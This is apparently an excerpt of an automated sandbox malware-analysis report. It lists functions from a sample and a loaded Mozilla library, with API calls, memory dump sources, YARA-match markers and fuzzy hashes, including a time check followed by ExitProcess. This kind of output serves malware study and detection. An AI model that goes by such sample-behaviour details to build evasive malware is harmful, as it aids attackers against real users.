                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C5E152B,?,?,?,?,6C5E1248,?), ref: 6C5E15E7
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C5E152B,?,?,?,?,6C5E1248,?), ref: 6C5E1606
                                                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C5E152B,?,?,?,?,6C5E1248,?), ref: 6C5E1637
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 733145618-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9abf812ad9e700267ca87e6f89cb861409f25deb5fe180aaea118ee7e18acef5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9327efc8962e44238542fceba6865303f681ca388bc4bec7196521564674d6f3
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9abf812ad9e700267ca87e6f89cb861409f25deb5fe180aaea118ee7e18acef5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B931C7B2A001148BCB18CF78DC5046F77A9AB893647250B2DE427DBBD6EB30D9058795
                                                                                                                                                                                                                                                                                                                                  Function 6C63AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C64E330,?,6C5FC059), ref: 6C63AD9D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C64E330,?,6C5FC059), ref: 6C63ADAC
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6C64E330,?,6C5FC059), ref: 6C63AE01
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6C64E330,?,6C5FC059), ref: 6C63AE1D
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C64E330,?,6C5FC059), ref: 6C63AE3D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3161513745-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bc231b7c49239a1162591f09406ff46b260bfc212b4fe37868ff71e1a05d6547
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 30de6af62aceb5e96d6b581c89fa9e4f16cf3bea232609c2ca3026da4307613c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc231b7c49239a1162591f09406ff46b260bfc212b4fe37868ff71e1a05d6547
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 253184B1A003159FDB14DF768C44AABBBF8EF49610F54842DE84AD7740E734D805CBA8
                                                                                                                                                                                                                                                                                                                                  Function 6C5DB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C5DB532
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C5DB55B
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5DB56B
                                                                                                                                                                                                                                                                                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C5DB57E
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C5DB58F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86563af1116feb6b3283440b9d960132e20edea544c4a51107a3ac5cb516f4e2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 15607d0a5452e4e6b1ca4ccc47db52fba61cffff37c3bb29810be99ea2da0d8b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86563af1116feb6b3283440b9d960132e20edea544c4a51107a3ac5cb516f4e2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9821F871A00205DBDB00DF69CC80B6ABBBAFF86304F694129E914DB342F775E911C7A5
                                                                                                                                                                                                                                                                                                                                  Function 6C636E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C636E78
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: InitializeCriticalSection.KERNEL32(6C65F618), ref: 6C636A68
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: GetCurrentProcess.KERNEL32 ref: 6C636A7D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: GetCurrentProcess.KERNEL32 ref: 6C636AA1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: EnterCriticalSection.KERNEL32(6C65F618), ref: 6C636AAE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C636AE1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C636B15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C636B65
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C636A10: LeaveCriticalSection.KERNEL32(6C65F618,?,?), ref: 6C636B83
                                                                                                                                                                                                                                                                                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C636EC1
                                                                                                                                                                                                                                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C636EE1
                                                                                                                                                                                                                                                                                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C636EED
                                                                                                                                                                                                                                                                                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C636EFF
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4058739482-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 58eda8d4a6d36c1341a1c0d6d6925a4449ac5631d69de7a1522861abcd40a728
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 550383b057776b2747030bb2c0bd34425953669ee1087aebac6f082393df34b5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58eda8d4a6d36c1341a1c0d6d6925a4449ac5631d69de7a1522861abcd40a728
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5821B0B1A0421A8FCB04CF29D8C469E77F5FF84308F044039E80D97240EB709A588F96
                                                                                                                                                                                                                                                                                                                                  Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,0079D738,?,004210F4,?,00000000,?), ref: 00416C0C
                                                                                                                                                                                                                                                                                                                                  • sscanf.NTDLL ref: 00416C39
                                                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,0079D738,?,004210F4), ref: 00416C52
                                                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0079D738,?,004210F4), ref: 00416C60
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00416C7A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2533653975-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 17bfd6dce98b409a799bdec13d55fbd2686ffc7b466988f927472609f38e9d3d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17bfd6dce98b409a799bdec13d55fbd2686ffc7b466988f927472609f38e9d3d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69
                                                                                                                                                                                                                                                                                                                                  Function 6C610D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C5D3DEF), ref: 6C610D71
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C5D3DEF), ref: 6C610D84
                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5D3DEF), ref: 6C610DAF
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1852963964-2186867486
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f4e922717177fc2f278fad4d047697dd5f1e26a9985597214cf97db2bfccdb2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 763da2434c194be4bca5f9fc2ebd09151a5612a3019fc0aab0d7d506f942b203
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f4e922717177fc2f278fad4d047697dd5f1e26a9985597214cf97db2bfccdb2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0E97179829423EE20196E0C0ABAA269D6BC2B27F704036F204DADC0DA90E43086AD
                                                                                                                                                                                                                                                                                                                                  Function 6C627620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6275C4,?), ref: 6C62762B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6274D7,6C6315FC,?,?,?), ref: 6C627644
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C62765A
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6274D7,6C6315FC,?,?,?), ref: 6C627663
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6274D7,6C6315FC,?,?,?), ref: 6C627677
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 418114769-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e6cad1ab39c8727f88d0a278cd4ebc1869b78a2e30daeb1d1bef5a0156ad310d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c07fdd471a13732dc1113f1b20b0c689b3327fa53add153fb563e5a418e3897e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6cad1ab39c8727f88d0a278cd4ebc1869b78a2e30daeb1d1bef5a0156ad310d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F0C271E10746ABD700CF22C888676B778FFEA299F614316F94453601E7B0A5D18BD0
                                                                                                                                                                                                                                                                                                                                  Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041CA7E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041CA95
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0041CAA3
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0041CAB3
                                                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c5a7914bfd81a4edf64c409ce704b1973edb92a02c079c255f399551119664c9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e15bae909d06919cb4135276c74b5d3530aaf41c11ecb0caa68e2a981b89e64
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0F06231A803189BD622FBA95C867DE33A0AF40758F50014FE405562D2CB7C59C186DE
                                                                                                                                                                                                                                                                                                                                  Function 6C5FD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: GetCurrentProcess.KERNEL32(?,6C5D31A7), ref: 6C60CBF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5D31A7), ref: 6C60CBFA
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD4F2
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD50B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DCFE0: EnterCriticalSection.KERNEL32(6C65E784), ref: 6C5DCFF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5DCFE0: LeaveCriticalSection.KERNEL32(6C65E784), ref: 6C5DD026
                                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD52E
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65E7DC), ref: 6C5FD690
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65E784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C60D1C5), ref: 6C5FD751
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2924f6e8314fd762110f2708798a467385a2584eceb2417cd27d399bfe341261
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bb9d73a9f5ce42c2c1bec6dfa7da42789ba3ae8b31b6a4cfc8177324bddf2e34
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2924f6e8314fd762110f2708798a467385a2584eceb2417cd27d399bfe341261
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9651E171A047018FD768CF29C59071AB7F1EB8A704FA4492ED5AAC7B84E770E801CF96
